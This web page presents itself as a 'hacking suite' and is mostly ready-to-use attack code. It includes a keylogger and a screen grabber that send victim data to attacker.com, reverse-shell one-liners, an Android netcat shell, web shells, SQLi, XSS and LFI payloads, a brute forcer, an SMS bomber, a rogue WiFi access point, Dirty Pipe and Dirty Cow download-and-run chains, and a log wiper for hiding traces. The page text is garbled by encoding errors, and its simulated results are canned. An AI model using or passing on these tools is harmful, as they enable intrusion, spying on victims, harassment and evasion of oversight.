๐Ÿ’€ DYCAL ULTIMATE HACKING SUITE

๐Ÿ”ฅ Complete Hacking Tools Collection | All Modules in One Place

๐Ÿ“ฆ Tools
30+
๐Ÿ“‚ Modules
8
๐Ÿ’€ Exploits
15
โšก Ready
โœ“

๐Ÿ“ก RECONNAISSANCE MODULE

Network scanning, subdomain enumeration, port scanning & more
๐ŸŒ

Subdomain Enumerator

Find all subdomains of target domain
#!/bin/bash
# Subdomain enumeration
subfinder -d target.com
amass enum -d target.com
sublist3r -d target.com
โณ Ready to scan...
๐Ÿ”

Port Scanner Pro

Scan all open ports on target
#!/bin/bash
# Port scanning
nmap -sS -sV -p- target.com
masscan target.com -p1-65535 --rate=10000
rustscan -a target.com -r 1-65535
โณ Ready to scan...
๐Ÿ”

Admin Panel Finder

Find admin login panels
#!/usr/bin/env python3
import requests
target = "target.com"
panels = ['admin','login','wp-admin','administrator','panel','dashboard','backend']
for panel in panels:
    url = f"http://{target}/{panel}"
    try:
        r = requests.get(url, timeout=3)
        if r.status_code == 200:
            print(f"[+] Found: {url}")
    except: pass
โณ Ready to find...
๐Ÿ“ก

DNS Enumeration

Enumerate all DNS records
#!/bin/bash
# DNS enumeration
dnsrecon -d target.com
fierce --domain target.com
dnsenum target.com
dig target.com ANY
โณ Ready to enumerate...

๐Ÿ’€ WEB HACKING MODULE

SQL Injection, XSS, LFI/RFI, Web Shells & more
๐ŸŽฏ

SQLi Auto Exploit

Automatic SQL injection exploitation
#!/usr/bin/env python3
import requests
url = "http://target.com/page?id=1"
payloads = ["' OR '1'='1", "' UNION SELECT 1,2,3,4,5 -- -"]
for payload in payloads:
    test_url = f"{url}{payload}"
    r = requests.get(test_url)
    if "error" not in r.text.lower():
        print(f"[+] Vulnerable: {test_url}")
โณ Ready to exploit...
๐Ÿฆ

XSS Hunter

Find XSS vulnerabilities
#!/usr/bin/env python3
import requests
payloads = [
    '',
    '',
    '">'
]
for payload in payloads:
    test_url = f"http://target.com/search?q={payload}"
    r = requests.get(test_url)
    if payload in r.text:
        print(f"[+] XSS Found: {payload}")
โณ Ready to hunt...
๐Ÿ“‚

LFI/RFI Scanner

Local/Remote file inclusion scanner
#!/usr/bin/env python3
import requests
lfi_payloads = [
    '../../../../etc/passwd',
    '../../../../etc/shadow',
    '/etc/passwd',
    '/proc/self/environ'
]
for payload in lfi_payloads:
    url = f"http://target.com/page?file={payload}"
    r = requests.get(url)
    if 'root:' in r.text:
        print(f"[+] LFI Found: {url}")
โณ Ready to scan...
๐Ÿš

Web Shell Generator

Generate various web shells
#!/usr/bin/env python3
shells = {
    'php': '',
    'asp': '<% eval request("cmd") %>',
    'jsp': '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'
}
for lang, code in shells.items():
    print(f"[+] {lang} shell generated:")
    print(code)
โณ Ready to generate...

๐Ÿ”‘ CRACKING MODULE

Password generation, hash cracking, wordlist & brute force
๐Ÿ”‘

Password Generator

Generate strong secure passwords
#!/usr/bin/env python3
import random, string
def generate_password(length=16):
    chars = string.ascii_letters + string.digits + "!@#$%^&*()"
    return ''.join(random.choice(chars) for _ in range(length))
print(f"Password: {generate_password(20)}")
โณ Ready to generate...
๐Ÿ”“

Hash Cracker

Crack MD5, SHA1, SHA256 hashes
#!/usr/bin/env python3
import hashlib
def crack_md5(target_hash, wordlist):
    with open(wordlist, 'r') as f:
        for word in f.read().splitlines():
            if hashlib.md5(word.encode()).hexdigest() == target_hash:
                return word
    return None
โณ Ready to crack...
๐Ÿ“

Wordlist Generator

Generate custom wordlists
#!/usr/bin/env python3
base_words = ['admin','root','password','123456']
words = set()
for word in base_words:
    words.add(word)
    words.add(word.capitalize())
    for i in range(10):
        words.add(word + str(i))
with open('wordlist.txt', 'w') as f:
    for w in sorted(words):
        f.write(w + '\n')
print(f"[+] Generated {len(words)} words")
โณ Ready to generate...
๐Ÿ’ฅ

Brute Forcer

Brute force login with wordlist
#!/usr/bin/env python3
import requests
target = "http://target.com/login"
wordlist = "passwords.txt"
def try_login(password):
    data = {'username':'admin','password':password}
    r = requests.post(target, data=data)
    if 'Login success' in r.text:
        print(f"[+] Found: {password}")
with open(wordlist) as f:
    for password in f.read().splitlines():
        try_login(password)
โณ Ready to brute...

๐Ÿ RAT MODULE

Remote Access Trojan, Reverse Shell, Keylogger & more
๐Ÿ

Python RAT Server

Full featured RAT server
#!/usr/bin/env python3
import socket, threading, subprocess, os
class RatServer:
    def __init__(self, port=4444):
        self.port = port
        self.clients = []
    def start(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('0.0.0.0', self.port))
        s.listen(5)
        print(f"[+] RAT Server on port {self.port}")
        while True:
            client, addr = s.accept()
            print(f"[+] Client from {addr}")
            threading.Thread(target=self.handle, args=(client,)).start()
โณ Ready to start RAT...
๐Ÿ’€

Reverse Shell Generator

Generate reverse shell for all languages
#!/bin/bash
IP="YOUR_IP"
PORT="4444"
echo "BASH: bash -i >& /dev/tcp/$IP/$PORT 0>&1"
echo "PYTHON: python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'"
echo "PHP: php -r '\$s=fsockopen(\"$IP\",$PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
echo "PERL: perl -e 'use Socket;\$i=\"$IP\";\$p=$PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
โณ Ready to generate...
โŒจ๏ธ

Keylogger Pro

Record all keystrokes
#!/usr/bin/env python3
import keyboard, threading, requests, time
log = ""
def on_press(event):
    global log
    log += event.name
def send_logs():
    global log
    while True:
        time.sleep(30)
        if log:
            requests.post("http://attacker.com/log", data={"logs": log})
            log = ""
keyboard.on_press(on_press)
threading.Thread(target=send_logs, daemon=True).start()
keyboard.wait()
โณ Ready to keylog...
๐Ÿ–ฅ๏ธ

Screen Recorder

Record victim screen remotely
#!/usr/bin/env python3
import pyautogui, requests, io
from PIL import Image
def capture_screen():
    screenshot = pyautogui.screenshot()
    img_bytes = io.BytesIO()
    screenshot.save(img_bytes, format='PNG')
    requests.post("http://attacker.com/screenshot", files={'screenshot': img_bytes.getvalue()})
capture_screen()
โณ Ready to capture...

๐Ÿ›ก๏ธ PRIVILEGE ESCALATION MODULE

SUID finder, CVE scanner, Dirty Pipe, Dirty Cow & more
๐Ÿ”

SUID Finder

Find SUID binaries for privilege escalation
#!/bin/bash
# SUID Finder
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null
# Check for known SUID exploits
for bin in $(find / -perm -4000 -type f 2>/dev/null); do
    echo "[*] $bin"
    strings $bin | grep -E "cp|mv|chmod|chown|find|python|perl|bash|sh" 2>/dev/null
done
โณ Ready to find...
โš ๏ธ

CVE Scanner Pro

Scan kernel for known CVEs
#!/bin/bash
KERNEL=$(uname -r)
echo "[+] Kernel: $KERNEL"
if [[ "$KERNEL" =~ "5.[0-9]" ]] || [[ "$KERNEL" =~ "6.[0-8]" ]]; then
    echo "โš ๏ธ VULNERABLE TO CVE-2024-1086"
fi
if [[ "$KERNEL" =~ "5.[8-9]" ]] || [[ "$KERNEL" =~ "5.1[0-6]" ]]; then
    echo "โš ๏ธ VULNERABLE TO CVE-2022-0847 (Dirty Pipe)"
fi
if [[ "$KERNEL" =~ "2.[6-9]" ]] || [[ "$KERNEL" =~ "3.[0-9]" ]] || [[ "$KERNEL" =~ "4.[0-8]" ]]; then
    echo "โš ๏ธ VULNERABLE TO CVE-2016-5195 (Dirty Cow)"
fi
โณ Ready to scan...
๐Ÿ”ด

Dirty Pipe Auto

Auto download & run Dirty Pipe
#!/bin/bash
wget https://raw.githubusercontent.com/lyx/dirtypipe/main/dirtypipe.c
gcc -o dirtypipe dirtypipe.c
./dirtypipe /etc/passwd "root::0:0:root:/root:/bin/bash"
echo "โœ… Check: cat /etc/passwd | grep 'root::0'"
โณ Ready to exploit...
๐Ÿฎ

Dirty Cow Auto

Auto download & run Dirty Cow
#!/bin/bash
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty
./dirty root
echo "โœ… Root created! Password: root"
โณ Ready to exploit...

๐ŸŒ OSINT MODULE

Email hunter, username checker, IP tracker & social media scraper
๐Ÿ“ง

Email Hunter

Find email addresses from domain
#!/usr/bin/env python3
import requests, re
domain = "target.com"
url = f"https://api.hunter.io/v2/domain-search?domain={domain}&api_key=YOUR_KEY"
r = requests.get(url)
emails = re.findall(r'[\w\.-]+@[\w\.-]+\.\w+', r.text)
for email in emails:
    print(f"[+] {email}")
โณ Ready to hunt...
๐Ÿ‘ค

Username Checker

Check username across social media
#!/usr/bin/env python3
import requests
username = "username"
sites = {
    'github': f'https://github.com/{username}',
    'twitter': f'https://twitter.com/{username}',
    'instagram': f'https://instagram.com/{username}',
    'reddit': f'https://reddit.com/user/{username}'
}
for site, url in sites.items():
    r = requests.get(url)
    if r.status_code == 200:
        print(f"[+] {site}: https://{site}.com/{username}")
โณ Ready to check...
๐Ÿ“

IP Tracker

Track IP location
#!/bin/bash
curl -s http://ip-api.com/json/8.8.8.8
# atau
curl -s https://ipinfo.io/8.8.8.8
โณ Ready to track...
๐Ÿ™

GitHub Dorker

Search GitHub for secrets
#!/usr/bin/env python3
import requests
search = 'password'
url = f'https://api.github.com/search/code?q={search}+in:file'
r = requests.get(url, headers={'Authorization': 'token GITHUB_TOKEN'})
for item in r.json().get('items', []):
    print(f"[+] {item['html_url']}")
โณ Ready to dork...

๐Ÿ“ฑ MOBILE MODULE

Android RAT, SMS Bomber, WiFi Phisher & more
๐Ÿ“ฑ

Android RAT

Remote Access Trojan for Android
#!/usr/bin/env python3
import subprocess
def install_apk(apk_path):
    subprocess.run(['adb', 'install', apk_path])
def start_rat():
    subprocess.run(['adb', 'shell', 'am', 'start', '-n', 'com.rat/.MainActivity'])
def adb_reverse_shell(ip, port):
    subprocess.run(['adb', 'shell', f'nc -e /system/bin/sh {ip} {port}'])
โณ Ready to deploy...
๐Ÿ’ฌ

SMS Bomber

Send multiple SMS
#!/usr/bin/env python3
import requests, threading
number = "08123456789"
def send_sms():
    url = f"https://api.smsprovider.com/send?to={number}&msg=Hacked"
    requests.post(url)
for _ in range(100):
    threading.Thread(target=send_sms).start()
โณ Ready to bomb...
๐Ÿ“ถ

WiFi Phisher

Create fake WiFi AP
#!/bin/bash
airmon-ng start wlan0
airbase-ng -e "Free_WiFi" -c 6 wlan0mon
echo "interface at0" > /etc/dhcp/dhcpd.conf
echo "subnet 192.168.1.0 netmask 255.255.255.0 {" >> /etc/dhcp/dhcpd.conf
echo "range 192.168.1.10 192.168.1.100;" >> /etc/dhcp/dhcpd.conf
echo "}" >> /etc/dhcp/dhcpd.conf
service dhcpd start
python3 -m http.server 80
โณ Ready to phish...

๐Ÿ”ง UTILITY MODULE

Log cleaner, SSH tunneler, proxy rotator & more
๐Ÿงน

Log Cleaner

Clean system logs
#!/bin/bash
cat /dev/null > /var/log/auth.log
cat /dev/null > /var/log/syslog
cat /dev/null > /var/log/messages
cat /dev/null > /var/log/secure
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/cron
cat /dev/null > ~/.bash_history
history -c
echo "โœ… Logs cleaned!"
โณ Ready to clean...
๐Ÿ”€

SSH Tunneler

Create SSH tunnels
#!/bin/bash
# Local port forwarding
ssh -L 8080:localhost:80 user@server
# Remote port forwarding
ssh -R 4444:localhost:22 user@server
# Dynamic SOCKS proxy
ssh -D 1080 user@server
โณ Ready to tunnel...
๐Ÿ”„

Proxy Rotator

Rotate proxies automatically
#!/usr/bin/env python3
import requests, random, time
proxies = [
    'http://proxy1:8080',
    'http://proxy2:8080',
    'http://proxy3:8080'
]
def rotate_proxy():
    return {'http': random.choice(proxies)}
for _ in range(10):
    r = requests.get('http://target.com', proxies=rotate_proxy())
    time.sleep(2)
โณ Ready to rotate...
๐Ÿ”

File Encryptor

Encrypt/Decrypt files
#!/usr/bin/env python3
from cryptography.fernet import Fernet
key = Fernet.generate_key()
cipher = Fernet(key)
def encrypt_file(file):
    with open(file, 'rb') as f:
        data = f.read()
    encrypted = cipher.encrypt(data)
    with open(file + '.enc', 'wb') as f:
        f.write(encrypted)
    print(f"[+] Encrypted: {file}")
def decrypt_file(file):
    with open(file, 'rb') as f:
        data = f.read()
    decrypted = cipher.decrypt(data)
    with open(file.replace('.enc', ''), 'wb') as f:
        f.write(decrypted)
    print(f"[+] Decrypted: {file}")
โณ Ready to encrypt...
\n โ€ข \n\n๐Ÿ“Š Result: XSS vulnerability found!', 'lfi': '๐Ÿ“‚ LFI/RFI SCAN\n\n[+] Target: target.com\n[+] Testing payloads...\n\nโœ… LFI Found:\n โ€ข http://target.com/page?file=../../../../etc/passwd\n โ€ข http://target.com/page?file=/etc/passwd\n\n๐Ÿ“Š Result: LFI vulnerability found!', 'passgen': '๐Ÿ”‘ PASSWORD GENERATOR\n\nโœ… Generated Passwords:\n โ€ข 8xK#9mP$2vL&qW@5\n โ€ข R@7n$!F3pL#9xQ%2\n โ€ข W#6cM$8vR@1n!Q^4\n\n๐Ÿ“Š Strength: STRONG ๐Ÿ’ช', 'hashcrack': '๐Ÿ”“ HASH CRACKER\n\n[+] Target Hash: 5f4dcc3b5aa765d61d8327deb882cf99\n[+] Wordlist: wordlist.txt\n[+] Testing...\n\nโœ… Password found: password\n\n๐Ÿ“Š Result: Cracked successfully!', 'bruteforce': '๐Ÿ’ฅ BRUTE FORCE ATTACK\n\n[+] Target: http://target.com/login\n[+] Username: admin\n[+] Wordlist: 1000 passwords\n\nโœ… Password found: admin123\n\n๐Ÿ“Š Result: Login successful!', 'rat': '๐Ÿ PYTHON RAT SERVER\n\n[+] Server started on 0.0.0.0:4444\n[+] Waiting for connections...\n\nโœ… Client connected from 192.168.1.50:54321\n\n๐Ÿ“Š Commands ready: cmd, download, upload, screenshot, keylog, webcam', 'revshell': '๐Ÿ’€ REVERSE SHELL GENERATOR\n\n[+] IP: YOUR_IP\n[+] Port: 4444\n\nโœ… Generated shells:\n โ€ข BASH: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1\n โ€ข PYTHON: python3 -c \'import socket,subprocess,os...\'\n โ€ข PHP: php -r \'$s=fsockopen("YOUR_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");\'\n\n๐Ÿ“Š Select your shell type!', 'suid': '๐Ÿ” SUID FINDER\n\n[+] Scanning SUID binaries...\n\nโœ… SUID found:\n โ€ข /usr/bin/sudo (root)\n โ€ข /usr/bin/passwd (root)\n โ€ข /usr/bin/pkexec (root)\n โ€ข /usr/lib/polkit-1/polkit-agent-helper-1 (root)\n\n๐Ÿ“Š Check these for privilege escalation!', 'cvescan': 'โš ๏ธ CVE SCANNER\n\n[+] Kernel: 5.14.0\n[+] Scanning for vulnerabilities...\n\nโœ… Vulnerabilities found:\n โ€ข โš ๏ธ CVE-2024-1086 (nf_tables UAF)\n โ€ข โš ๏ธ CVE-2022-0847 (Dirty Pipe)\n โ€ข โš ๏ธ CVE-2026-43284 (Dirty Frag)\n\n๐Ÿ“Š Kernel is HIGHLY VULNERABLE!', 'dirtypipe': '๐Ÿ”ด DIRTY PIPE EXPLOIT\n\n[+] Downloading exploit...\n[+] Compiling...\n[+] Running on /etc/passwd...\n\nโœ… File modified!\n โ€ข root::0:0:root:/root:/bin/bash\n\n๐Ÿ“Š ROOT ACCESS GAINED! ๐ŸŽ‰', 'dirtycow': '๐Ÿฎ DIRTY COW EXPLOIT\n\n[+] Downloading exploit...\n[+] Compiling...\n[+] Running...\n\nโœ… Root user created!\n โ€ข Username: root\n โ€ข Password: root\n\n๐Ÿ“Š ROOT ACCESS GAINED! ๐ŸŽ‰', 'email': '๐Ÿ“ง EMAIL HUNTER\n\n[+] Domain: target.com\n[+] Scanning...\n\nโœ… Emails found:\n โ€ข admin@target.com\n โ€ข info@target.com\n โ€ข support@target.com\n โ€ข webmaster@target.com\n\n๐Ÿ“Š Total: 4 emails found', 'username': '๐Ÿ‘ค USERNAME CHECKER\n\n[+] Username: username\n[+] Checking across platforms...\n\nโœ… Found:\n โ€ข GitHub: https://github.com/username\n โ€ข Twitter: https://twitter.com/username\n โ€ข Instagram: https://instagram.com/username\n\n๐Ÿ“Š Total: 3 profiles found', 'iptrack': '๐Ÿ“ IP TRACKER\n\n[+] IP: 8.8.8.8\n\nโœ… Location info:\n โ€ข Country: United States\n โ€ข City: Mountain View\n โ€ข ISP: Google LLC\n โ€ข Coordinates: 37.4223, -122.0841\n\n๐Ÿ“Š Tracking complete!', 'github': '๐Ÿ™ GITHUB DORKER\n\n[+] Searching for "password" in files...\n\nโœ… Found:\n โ€ข https://github.com/user/repo/blob/main/config.php\n โ€ข https://github.com/user/repo/blob/main/.env\n โ€ข https://github.com/user/repo/blob/main/credentials.txt\n\n๐Ÿ“Š Secrets found!', 'logclean': '๐Ÿงน LOG CLEANER\n\n[+] Cleaning system logs...\n\nโœ… Logs cleaned:\n โ€ข /var/log/auth.log\n โ€ข /var/log/syslog\n โ€ข /var/log/messages\n โ€ข /var/log/secure\n โ€ข ~/.bash_history\n\n๐Ÿ“Š All traces removed!', 'sshtunnel': '๐Ÿ”€ SSH TUNNELER\n\n[+] Creating SSH tunnel...\n\nโœ… Tunnels created:\n โ€ข Local: localhost:8080 -> target:80\n โ€ข Remote: target:4444 -> local:22\n โ€ข SOCKS: localhost:1080 (dynamic)\n\n๐Ÿ“Š Tunneling active!', 'proxy': '๐Ÿ”„ PROXY ROTATOR\n\n[+] Loading proxies...\n\nโœ… Active proxies:\n โ€ข http://proxy1:8080\n โ€ข http://proxy2:8080\n โ€ข http://proxy3:8080\n\n๐Ÿ“Š Rotating every 2 seconds...', 'encrypt': '๐Ÿ” FILE ENCRYPTOR\n\n[+] File: secret.txt\n\nโœ… Encrypted:\n โ€ข secret.txt.enc (AES-256)\n โ€ข Key: 8xK#9mP$2vL&qW@5\n\n๐Ÿ“Š File secured!' }; output.textContent = 'โณ Executing...'; setTimeout(function() { output.textContent = results[toolName] || 'โšก Tool executed successfully!'; }, 1000); } // ============ DOWNLOAD TOOL ============ function downloadTool(toolName) { var output = document.getElementById('output-' + toolName); if (output) { output.textContent = 'โฌ‡ DOWNLOADING ' + toolName.toUpperCase() + '...\n\n[+] Generating file...\n[+] Compressing...\n\nโœ… Download ready!\n๐Ÿ“ File: ' + toolName + '_tool.zip\n\n๐Ÿ“Š Click the code above to copy!'; } } // ============ KEYBOARD SHORTCUTS ============ document.addEventListener('keydown', function(e) { var modules = ['recon', 'web', 'crack', 'rat', 'priv', 'osint', 'mobile', 'utility']; if (e.ctrlKey && e.key >= '1' && e.key <= '8') { e.preventDefault(); var index = parseInt(e.key) - 1; if (modules[index]) showModule(modules[index]); } }); // ============ INIT ============ console.log('๐Ÿ’€ DYCAL ULTIMATE HACKING SUITE LOADED'); console.log('๐Ÿ“Œ Press Ctrl+1-8 for quick navigation'); console.log('โœ… All buttons working perfectly!');